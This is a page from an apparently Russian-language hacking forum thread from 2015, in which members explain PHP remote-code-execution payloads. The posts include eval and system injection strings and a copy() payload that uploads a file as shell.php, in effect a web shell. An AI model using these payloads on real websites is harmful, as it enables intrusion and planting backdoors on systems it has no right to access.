HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу SQLi и RCE
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 29.05.2015, 23:04
Mister_Bert0ni
Участник форума
Регистрация: 10.05.2015
Сообщений: 142
Провел на форуме:
35015

Репутация: 57
По умолчанию
Цитата:
Сообщение от None  
с RCE все просто: там фильтровались кавычки, но нам они и не нужны.
делаем запрос:
Где можно про RCE в PHP почитать?Можеть есть какие то мануалы?

Цитата:
Сообщение от None  
$${@eval($_REQUEST[upl])}
$${@system(pwd)}
Если не трудно - можете хотябы вкратце обьяснить почему такой синтаксис запроса?Где читать?Почему запрос начинается с $$ и скопки фигурные?

Цитата:
Сообщение от None  

Если не сложно можно в кратце обьяснить что какой фрагмент кода делает?

[CODE]
 
Ответить с цитированием

  #12  
Старый 31.05.2015, 00:10
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
[QUOTE="Mister_Bert0ni"]

Где можно про RCE в PHP почитать?Можеть есть какие то мануалы?
Если не трудно - можете хотябы вкратце обьяснить почему такой синтаксис запроса?Где читать?Почему запрос начинается с $$ и скопки фигурные?
Если не сложно можно в кратце обьяснить что какой фрагмент кода делает?
Код:


это просто форма. мы делаем запрос:





	
Код:

	
copy($_FILES[file][tmp_name], $_GET[aa]);&aa=./shell.php


http://php.net/manual/ru/function.copy.php



в первом параметре file - передается файл из формы, во второй передаем имя загруженного файла через параемтр aa в GET запросе, в данном случае - shell.php



pwd это системная команда Linux, чтобы узнать в какой мы находимся директории

	
		
		
		
		
		
			




	
	







 
	
	
		

			
			
			
				Ответить с цитированием
			
			
		
      
			










	

	
		
	






	
	

	




	
	
		





 


  

    
 

  



 





	
		

			 
#13  
			
			
			
		

		
		

			Старый
			
				31.05.2015, 00:27
			
			
		

			




	
		
		

		

			
				

				

					
					Mister_Bert0ni 
					
					
				

				
				
Участник форума
		
			
				

					
Регистрация: 10.05.2015

					

						Сообщений: 142
					


Провел на форуме:
 35015



    

    Репутация: 
    
        57
    
    
    





					

                                              

				

					
		

		

		
			
	
		
			

				По умолчанию
				
			

			

		
		
		
Да с формой из pwd все было понятно кроме  того для чего в форму передавали GET_ом shell) Вопрос возник по синтаксису PHP 





	
Код:

	
$${@command()}


В любом случае спасибо большое.



И хотел спросить где можно посмотреть различные варианты upload-эров???

	
		
		
		
		
		
			




	
	







 
	
	
		

			
			
			
				Ответить с цитированием
			
			
		
      
			










	

	
		
	






	
	

	




	
	
		





 


  

    
 

  



 





	
		

			 
#14  
			
			
			
		

		
		

			Старый
			
				31.05.2015, 01:31
			
			
		

			




	
		
		

		

			
				

				

					
					Strilo4ka 
					
					
				

				
				
Reservists Of Antichat - Level 6
		
			
				

					
Регистрация: 05.04.2009

					

						Сообщений: 231
					


Провел на форуме:
 3363660



    

    Репутация: 
    
        1148
    
    
    





					

                                              

				

					
		

		

		
			
	
		
			

				По умолчанию
				
			

			

		
		
		


Цитата:









Сообщение от Mister_Bert0ni  



Да с формой из pwd все было понятно кроме  того для чего в форму передавали GET_ом shell) Вопрос возник по синтаксису PHP



	
Код:

	
$${@command()}


В любом случае спасибо большое.

И хотел спросить где можно посмотреть различные варианты upload-эров???




${@command()} проще же

	
		
		
		
		
		
			




	
	







 
	
	
		

			
			
			
				Ответить с цитированием
			
			
		
      
			










	

	
		
	






	
	

	




	
	
		





 


  

    
 

  



 





	
		

			 
#15  
			
			
			
		

		
		

			Старый
			
				31.05.2015, 01:38
			
			
		

			




	
		
		

		

			
				

				

					
					Mister_Bert0ni 
					
					
				

				
				
Участник форума
		
			
				

					
Регистрация: 10.05.2015

					

						Сообщений: 142
					


Провел на форуме:
 35015



    

    Репутация: 
    
        57
    
    
    





					

                                              

				

					
		

		

		
			
	
		
			

				По умолчанию
				
			

			

		
		
		


Цитата:









Сообщение от Strilo4ka  



${@command()} проще же




Он во всех ситуация так легко применяется?

	
		
		
		
		
		
			




	
	







 
	
	
		

			
			
			
				Ответить с цитированием
			
			
		
      
			










	

	
		
	






	
	

	




	
	
		





 


  

    
 

  



 





	
		

			 
#16  
			
			
			
		

		
		

			Старый
			
				31.05.2015, 01:56
			
			
		

			




	
		
		

		

			
				

				

					
					Strilo4ka 
					
					
				

				
				
Reservists Of Antichat - Level 6
		
			
				

					
Регистрация: 05.04.2009

					

						Сообщений: 231
					


Провел на форуме:
 3363660



    

    Репутация: 
    
        1148
    
    
    





					

                                              

				

					
		

		

		
			
	
		
			

				По умолчанию
				
			

			

		
		
		
ну да, обращаться к отдельному символу строки всегда легко, даже когда разыменование переменной

	
		
		
		
		
		
			




	
	







 
	
	
		

			
			
			
				Ответить с цитированием
			
			
		
      
			










	

	
		
	




















	
		Ответ
		
	





	Страница 2 из 2



	
	<
		

	1

	2
 
	
	




























	«
			Предыдущая тема
		|
		Следующая тема
	»












	

	

		
			Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
		
	

	

		
			 
		
	

	





















































		

		
		

			
			

	

	
	
	Быстрый переход

	
	



					
		
		
		























	
 

        

	
	

	
	

	
	

	
	
	
	
	
	

 


		

		

		

		         
		

		

                        
                            

                                
                                
                                   
                                 
                                 
                                 
				
                                     
                                      
                                             ANTICHAT ™ © 2001- Antichat Kft.